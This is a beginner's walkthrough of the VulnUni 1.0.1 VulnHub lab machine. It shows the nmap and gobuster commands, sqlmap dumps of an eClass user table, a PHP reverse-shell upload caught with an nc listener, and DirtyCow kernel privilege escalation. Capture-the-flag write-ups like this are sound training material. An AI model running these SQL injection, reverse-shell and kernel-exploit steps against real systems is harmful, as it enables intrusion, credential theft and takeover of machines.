VulnUni: 1.0.1 | walkthrough |writeup| vulnhub
Hello, friends I’m Shams Ul Mehmood and this is my first article. This article is a walkthrough of VULNUNI: 1.0.1 Vulnhub Box. This box also is a Boot to Root beginner-level challenge. You can find this Vulnhub box from here.
Penetration Methodologies
- Network Scanning
- Identify running service & open Ports (Nmap)
2. Enumeration / Reconnaissance
- Web Directories (DIRB / GOBUSTER)
- Vulnerable to RCE (Burp Suite)
3. Exploits
- First Exploit (SQL Injection)
- Second Exploit (Upload backdoor →PHP reverse shell)
- Third Exploit (phpMyAdmin Remote Access)
- Fourth Exploit (Plaintext Password Storage)
4. Privilege Escalation
- Abusing Capability Permission
- Using DirtyCow to exploit kernel version
- Capturing the flag
Walkthrough
Network Scanning
📌️ In the first step of the scanning, I used the arp-scan and netdiscover -r commands to perform a Local Network Scan to find out the IP address of the targeted machine.
First-Command: arp-scan
Second-Command: netdiscover -r
📌️ After getting the target machine’s IP address I performed a Nmap scan to my target. I used,
- -sV : to application version scan
- -sS : to running services scan
- -Pn : to skip host discovery scan
- -sC : to default script scan
Command : sudo nmap -sV -sC -Pn -sS 192.168.204.141
📌️ From this Nmap scan, I found there tcp 80 port is open. So that means we can browse this IP on the browser. In this page show us to some homepage.
Enumeration / Reconnaissance
📌️ So in this part, I used the dirbuster and gobuster tools to enumerate interesting hidden files and directories on this target machine.
Command : dirb http://192.168.204.141
Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.204.141 -x php,js,py,java,dart,rar,zip,pdf,exe
📌️ So I do not found an interesting thing.
📌️ lets visit full site manually and check the source code also, found a comment in the source code of page courses saying to disable a page “vulnuni-eclass-platform.html” till the new version is installed.
📌️ lets visit the commented page manually
📌️ found a redirection to the login page.
📌️page not found due to the a-name record, as it redirects to the “vulnuni.local/vulnuni-eclass/index.php”
📌️ lets ping the vulnuni.local
Command : ping vulnuni.local
📌️ lets edit our hosts file
Command : sudo nano /etc/hosts
📌️ lets again ping the same domain vulnuni.local
📌️ Now you can see a connection to the server at vulnuni.local
📌️ Lets try again on redirection to the login page.
📌️ here it is, I tried some default username and password like admin:admin, user:password but didn’t worked.
📌️ found the eclass current version installed, lets google for the vulnerabilities in eclass version 1.7.2 .
Exploits
📌️ Got vulnerability of Unauthenticated Blind SQL Injection on a particular parameter.
First Exploit:
📌️ In first exploit, we need to use BurpSuite for this first exploit. We want to use (FoxyProxy and Burp) Login with user credentials and turn on the intercept in my BurpSuit to capture the login HTTP requests from login page vulnuni.local/vulnuni-eclass and save it to file. You can do this by using copy to file > save as vulnuni_sql_attack.txt and load the into sqlmap.
📌️ lets use these parameters , as we don’t have any account so we will go for time-based blind injection as said in above exploit.
📌️ Remember we want the request and not the response.
📌️ Now for sqlmap. According to the exploit the way to load the request into sqlmap is by using the command.
Command : sqlmap -r ./Desktop/vulnuni_sql_attack.txt — dbs
Command : sqlmap -r ./Desktop/vulnuni_sql_attack.txt -D eclass — tables
Command : sqlmap -r ./Desktop/vulnuni_sql_attack.txt -D eclass -T user — columns
Command : sqlmap -r ./Desktop/vulnuni_sql_attack.txt -D eclass -T user -C username, user_id, password, phone, email, department, am, inst_id, nom, prenom, statut — dump
📌️ Got login with admin privilages, with the extracted credential from mysql.
admin : ilikecats89
Second Exploit:
📌️ This exploit require an admin account which we now have! So login to the login page again with the credentials admin : ilikecats89. Lets follow the this exploit to take reverse shell.
📌️ The difference in these two exploits is that this one will end with me getting a terminal shell on victim.
📌️ To complete this exploit get the webshell from here and edit the shell to show your current networking settings. Set the listening port to 4444.
📌️ lets follow and navigate to /modules/course_info/restore_course.php
📌️ Lets compress our shell in a zip file.
Command : zip zipped_vulnuni_php_reverse_shell.zip vulnuni_php_reverse_shell.php
📌️ Then follow and navigate to vulnuni.local/vulnuni-eclass/courses
📌️ Then follow and navigate to vulnuni.local/vulnuni-eclass/courses/tmpUnzipping/Desktop
📌️ Upload the zip file and lets start a nc listener.
Command : sudo nc -nvlp 4444
📌️ Now we just have to invoke the given location in the web browser “/courses/tmpUnzipping/php-reverse-shell.php” and will get shell.
📌️ The first thing to do with a Bash Shell is to get a better terminal shell. Do that by using the tty module (teletypewriter) by doing a python -c ‘import pty; pty.spawn(“/bin/bash”)’.
📌️ Now that I have a terminal shell it’s time for the privilege escalation step. I find the user flag first, however which is found in the www-data user’s home directory as flag.txt
📌️ Using the uname -srm (-s kernel name / -r kernel release / -m machine name) command. I see that the Linux Kernel Version is 3.11.0–15-generic.
📌️ So I will try to use the Dirty-Cow exploit in last part of this walkthrough.
Third Exploit:
📌️ In third exploit, here we are trying to gain phpMyAdmin remote access by using root user credentials and credentials available in config.php file.
📌️ Now we just have to use the absolute path in terminal shell “/var/www/vulnuni-eclass/config/config.php” and then we will get root user credentials (root : MYSQLstrongpass1337).
📌️ Here we can use alternative way to access root user credentials in phpMyAdmin page. For that we need to navigate to “vulnuni.local/vulnuni-eclass/modules/admin/confinfo.php” in web browser.
📌️ So here you can see, we are successfully login to phpMyAdmin as a root user.
Fourth Exploit:
📌️ According to fourth exploit, to access plaintext stored password. For that we need to navigate to “vulnuni.local/vulnuni-eclass/modules/admin/listusers.php” in web browser.
Privilege Escalation
📌️ In this vulnhub vulnuni walkthrough I say to use DirtyCow. DirtyCow can be unstable, somthing the exploit documentation actually says. I had to compile the DirtyCow exploit 3 times actually to get a usable root terminal shell.
📌️ Start a simple apache2 web server using sudo service apache2 start and serve up the DirtyCow exploit C file.
📌️ So lets download the DirtyCow file (my_dirty.c) on victim machine.
📌️ So I compile the exploit code with the native C compiler gcc and compile it according to the exploit guidelines.
Command : gcc -Wall -o dirtycow my_dirty.c -ldl -lpthread
📌️ Before execution, first I need to enable the execution permission for dirtycow file then I will run the exploit to get a root-level shell.
Command : chmod +x dirtycow
Command : ./dirtycow
📌️ Finally, I successfully capture the required flag in root-level shell🎯🎯.
Done….🚀🏆🎯💯🤩
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠈⢿⣿⠏⠀⠀⠀⠀⠀⠀⢀⣿⣿⡆⠀
⠀⠀⠀⠀⠀⢀⣠⢤⣶⣤⣤⣶⡿⠃⠀⠀⠿⠛⠋⠿⠀⠀
⠀⠀⠀⠀⣠⣿⠟⣾⣿⠋⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠛⠃⠐⠿⣿⣶⣦⣤⠀⠀⠀⠀⠀⢠⣶⣶⣶⣶
⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⢈⣿⡄⢰⣶⣶⣶⣾⣿⣿⣿⣿
⠀⠀⠀⠀⠀⢀⣾⡿⠁⣀⣀⣿⣁⣾⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⣙⣋⣀⣀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿